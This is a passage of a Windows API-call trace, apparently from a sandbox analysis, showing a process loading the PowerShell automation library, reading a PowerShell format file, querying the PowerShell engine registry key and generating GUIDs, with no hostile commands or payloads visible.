	[0402.033] VirtualQuery (in: lpAddress=0x26b8d0, lpBuffer=0x26c790, dwLength=0x30 | out: lpBuffer=0x26c790*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.034] VirtualQuery (in: lpAddress=0x26b960, lpBuffer=0x26c820, dwLength=0x30 | out: lpBuffer=0x26c820*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.034] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xefd5af1c, Data2=0xc6e9, Data3=0x4dcd, Data4=([0]=0x83, [1]=0xa2, [2]=0x21, [3]=0x76, [4]=0x61, [5]=0xa3, [6]=0x74, [7]=0xab))) returned 0x0
	[0402.034] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x4ee6314c, Data2=0xa64f, Data3=0x4150, Data4=([0]=0xba, [1]=0x2, [2]=0x9a, [3]=0x32, [4]=0xe1, [5]=0xcb, [6]=0xe3, [7]=0xc9))) returned 0x0
	[0402.034] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xb76c5be6, Data2=0xd8a, Data3=0x4e51, Data4=([0]=0xa9, [1]=0xf7, [2]=0x60, [3]=0x56, [4]=0xa2, [5]=0x67, [6]=0x7d, [7]=0x21))) returned 0x0
	[0402.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0402.035] SetErrorMode (uMode=0x1) returned 0x1
	[0402.035] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0402.035] GetFileType (hFile=0x300) returned 0x1
	[0402.035] SetErrorMode (uMode=0x1) returned 0x1
	[0402.035] GetFileType (hFile=0x300) returned 0x1
	[0402.035] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.036] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.036] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.036] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.036] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.036] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.037] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.037] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.037] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.038] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.038] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.038] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.038] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.038] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.038] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.039] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.039] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.040] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.040] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.040] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.040] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.041] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0xe67, lpOverlapped=0x0) returned 1
	[0402.041] ReadFile (in: hFile=0x300, lpBuffer=0x322f73f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x322f73f*, lpNumberOfBytesRead=0x26d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0402.041] ReadFile (in: hFile=0x300, lpBuffer=0x3230170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3230170*, lpNumberOfBytesRead=0x26d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0402.041] CloseHandle (hObject=0x300) returned 1
	[0402.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0402.041] SetErrorMode (uMode=0x1) returned 0x1
	[0402.041] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d060 | out: lpFileInformation=0x26d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0402.041] SetErrorMode (uMode=0x1) returned 0x1
	[0402.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0402.042] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d148 | out: phkResult=0x26d148*=0x300) returned 0x0
	[0402.042] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d0cc, lpData=0x0, lpcbData=0x26d0c8*=0x0 | out: lpType=0x26d0cc*=0x1, lpData=0x0, lpcbData=0x26d0c8*=0x56) returned 0x0
	[0402.042] CoTaskMemAlloc (cb=0x5a) returned 0x47ed70
	[0402.042] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d09c, lpData=0x47ed70, lpcbData=0x26d098*=0x56 | out: lpType=0x26d09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d098*=0x56) returned 0x0
	[0402.042] CoTaskMemFree (pv=0x47ed70) 
	[0402.042] RegCloseKey (hKey=0x300) returned 0x0
	[0402.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0402.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0402.043] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xf2214834, Data2=0xc595, Data3=0x43cb, Data4=([0]=0x96, [1]=0x4e, [2]=0xd9, [3]=0x96, [4]=0x7a, [5]=0x65, [6]=0xed, [7]=0x9e))) returned 0x0
	[0402.044] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x717def71, Data2=0xa1fc, Data3=0x4cf9, Data4=([0]=0x89, [1]=0x4a, [2]=0x37, [3]=0x92, [4]=0xc8, [5]=0x15, [6]=0x3f, [7]=0x54))) returned 0x0
	[0402.044] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x25b2a4ba, Data2=0x7aaa, Data3=0x497f, Data4=([0]=0x9a, [1]=0x56, [2]=0xcf, [3]=0x5b, [4]=0x9f, [5]=0x5d, [6]=0xd8, [7]=0xe2))) returned 0x0
	[0402.044] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xef25e07b, Data2=0x25dc, Data3=0x408d, Data4=([0]=0xbe, [1]=0x4f, [2]=0x58, [3]=0xb9, [4]=0x72, [5]=0x7a, [6]=0xfc, [7]=0xcb))) returned 0x0
	[0402.044] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x2b05438, Data2=0x86e0, Data3=0x462a, Data4=([0]=0x8c, [1]=0xb2, [2]=0x98, [3]=0x3, [4]=0x76, [5]=0x4c, [6]=0x30, [7]=0xdb))) returned 0x0
	[0402.044] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x2d66175a, Data2=0xb0bf, Data3=0x4208, Data4=([0]=0x9e, [1]=0xe9, [2]=0x8d, [3]=0xa, [4]=0x8f, [5]=0x34, [6]=0xe0, [7]=0xd6))) returned 0x0
	[0402.044] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x6bc18b3b, Data2=0xcef3, Data3=0x4bf9, Data4=([0]=0xa3, [1]=0x7c, [2]=0x7e, [3]=0xbc, [4]=0x34, [5]=0xf1, [6]=0x43, [7]=0x39))) returned 0x0
	[0402.044] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.044] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xd0385f82, Data2=0xb915, Data3=0x4338, Data4=([0]=0x92, [1]=0x9c, [2]=0xea, [3]=0x65, [4]=0xc1, [5]=0xf5, [6]=0xf0, [7]=0xa8))) returned 0x0
	[0402.044] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xb38d58fd, Data2=0x44f, Data3=0x482e, Data4=([0]=0xb7, [1]=0x36, [2]=0x4a, [3]=0xd4, [4]=0xb0, [5]=0x0, [6]=0x2c, [7]=0x5c))) returned 0x0
	[0402.044] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x32212101, Data2=0x69d2, Data3=0x4de3, Data4=([0]=0x8d, [1]=0x63, [2]=0xfa, [3]=0xa0, [4]=0x82, [5]=0x72, [6]=0xb5, [7]=0x53))) returned 0x0
	[0402.045] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x29315c32, Data2=0x20cb, Data3=0x4964, Data4=([0]=0xaf, [1]=0x2, [2]=0xfe, [3]=0x50, [4]=0x78, [5]=0xf0, [6]=0xeb, [7]=0xcb))) returned 0x0
	[0402.045] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x70718663, Data2=0xe1b9, Data3=0x48e4, Data4=([0]=0x8f, [1]=0x31, [2]=0x7, [3]=0xef, [4]=0x5f, [5]=0xda, [6]=0xd4, [7]=0xdf))) returned 0x0
	[0402.045] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x40d91af4, Data2=0x7e6f, Data3=0x4fdc, Data4=([0]=0x83, [1]=0xe9, [2]=0x96, [3]=0xb8, [4]=0x56, [5]=0x47, [6]=0xee, [7]=0xf1))) returned 0x0
	[0402.045] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xa2016da2, Data2=0x113f, Data3=0x4d76, Data4=([0]=0xad, [1]=0x19, [2]=0x38, [3]=0x42, [4]=0x5d, [5]=0x1, [6]=0x43, [7]=0x58))) returned 0x0
	[0402.045] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xa7947cbf, Data2=0x1240, Data3=0x4560, Data4=([0]=0xa9, [1]=0xe9, [2]=0xd2, [3]=0xa9, [4]=0xf7, [5]=0xdf, [6]=0x3, [7]=0x70))) returned 0x0
	[0402.045] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xbc96cdcf, Data2=0x9dec, Data3=0x4201, Data4=([0]=0x96, [1]=0x55, [2]=0xf8, [3]=0x66, [4]=0xca, [5]=0x5f, [6]=0x20, [7]=0xf8))) returned 0x0
	[0402.045] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xc8abb383, Data2=0x50d3, Data3=0x46b4, Data4=([0]=0xaf, [1]=0xe, [2]=0x10, [3]=0x7e, [4]=0x94, [5]=0xbd, [6]=0x88, [7]=0xed))) returned 0x0
	[0402.045] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xd4a47c24, Data2=0x9597, Data3=0x4677, Data4=([0]=0xaf, [1]=0x69, [2]=0x75, [3]=0x31, [4]=0x4f, [5]=0xb9, [6]=0x59, [7]=0xa5))) returned 0x0
	[0402.045] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x810e72b9, Data2=0x887e, Data3=0x4a10, Data4=([0]=0xa1, [1]=0x4c, [2]=0x50, [3]=0xa5, [4]=0xe2, [5]=0x74, [6]=0x6d, [7]=0x3f))) returned 0x0
	[0402.045] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.046] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.046] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.046] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xde399a67, Data2=0xc5ff, Data3=0x4711, Data4=([0]=0x85, [1]=0x22, [2]=0x58, [3]=0x6d, [4]=0xb3, [5]=0x5a, [6]=0xef, [7]=0xc6))) returned 0x0
	[0402.046] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xd11c9931, Data2=0xee38, Data3=0x40b9, Data4=([0]=0x94, [1]=0xde, [2]=0x4a, [3]=0x46, [4]=0xdd, [5]=0x31, [6]=0x64, [7]=0xd9))) returned 0x0
	[0402.046] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xfe1159a5, Data2=0xec3, Data3=0x4572, Data4=([0]=0xa2, [1]=0x85, [2]=0xdc, [3]=0xfe, [4]=0xc9, [5]=0x6b, [6]=0x1a, [7]=0x8d))) returned 0x0
	[0402.046] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xed6a7f3b, Data2=0x7c09, Data3=0x4d7a, Data4=([0]=0x8b, [1]=0x7, [2]=0x2f, [3]=0xee, [4]=0x8f, [5]=0x98, [6]=0x2a, [7]=0x10))) returned 0x0
	[0402.046] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x9b5a0393, Data2=0x421b, Data3=0x482b, Data4=([0]=0x9a, [1]=0x70, [2]=0xb2, [3]=0xf5, [4]=0x94, [5]=0x70, [6]=0x62, [7]=0x7f))) returned 0x0
	[0402.046] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xe2cad328, Data2=0xf9b1, Data3=0x4a1b, Data4=([0]=0x89, [1]=0x79, [2]=0x78, [3]=0xd8, [4]=0x4d, [5]=0xc1, [6]=0xa6, [7]=0x5b))) returned 0x0
	[0402.046] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x8e874293, Data2=0x3a29, Data3=0x498e, Data4=([0]=0xad, [1]=0xdd, [2]=0xd7, [3]=0x1, [4]=0xb3, [5]=0x75, [6]=0x81, [7]=0xe8))) returned 0x0
	[0402.046] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x4e577355, Data2=0xbe64, Data3=0x4458, Data4=([0]=0xb1, [1]=0xc6, [2]=0xa8, [3]=0x72, [4]=0x8c, [5]=0x4, [6]=0x9c, [7]=0x6c))) returned 0x0
	[0402.046] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xb69ddfe6, Data2=0x4dd, Data3=0x41dc, Data4=([0]=0xa9, [1]=0x4a, [2]=0x2d, [3]=0x95, [4]=0xff, [5]=0x6a, [6]=0x11, [7]=0xca))) returned 0x0
	[0402.047] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xad772f27, Data2=0x35, Data3=0x48e6, Data4=([0]=0xba, [1]=0xd1, [2]=0xb0, [3]=0xf5, [4]=0x2b, [5]=0x69, [6]=0x76, [7]=0x32))) returned 0x0
	[0402.047] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xe5e7fa6b, Data2=0x91a, Data3=0x4ff6, Data4=([0]=0x92, [1]=0x2a, [2]=0xff, [3]=0x91, [4]=0xaa, [5]=0x89, [6]=0x62, [7]=0x37))) returned 0x0
	[0402.047] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x87565cd2, Data2=0x6998, Data3=0x4423, Data4=([0]=0xb8, [1]=0x8a, [2]=0x9a, [3]=0x97, [4]=0xd, [5]=0x5a, [6]=0xb8, [7]=0x7b))) returned 0x0
	[0402.047] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x127975c4, Data2=0x62b0, Data3=0x4d0f, Data4=([0]=0xb1, [1]=0x38, [2]=0x95, [3]=0x97, [4]=0x14, [5]=0xed, [6]=0xbf, [7]=0x32))) returned 0x0
	[0402.047] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.047] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xf03e4908, Data2=0x40e4, Data3=0x47e5, Data4=([0]=0xb8, [1]=0x97, [2]=0xc5, [3]=0xd1, [4]=0x16, [5]=0x47, [6]=0x27, [7]=0x68))) returned 0x0
	[0402.047] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.395] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.396] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xf603b7ae, Data2=0xf298, Data3=0x4b2a, Data4=([0]=0xa9, [1]=0x86, [2]=0x6e, [3]=0x7e, [4]=0xa0, [5]=0x4a, [6]=0x53, [7]=0xde))) returned 0x0
	[0402.396] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.396] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x23bc9ac9, Data2=0x36c4, Data3=0x417e, Data4=([0]=0xb6, [1]=0x28, [2]=0xf8, [3]=0x80, [4]=0x9f, [5]=0xc4, [6]=0x1a, [7]=0x4e))) returned 0x0
	[0402.396] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x81aaba3c, Data2=0x15f5, Data3=0x40e9, Data4=([0]=0xa2, [1]=0xf4, [2]=0xce, [3]=0x14, [4]=0x15, [5]=0x87, [6]=0x36, [7]=0x1a))) returned 0x0
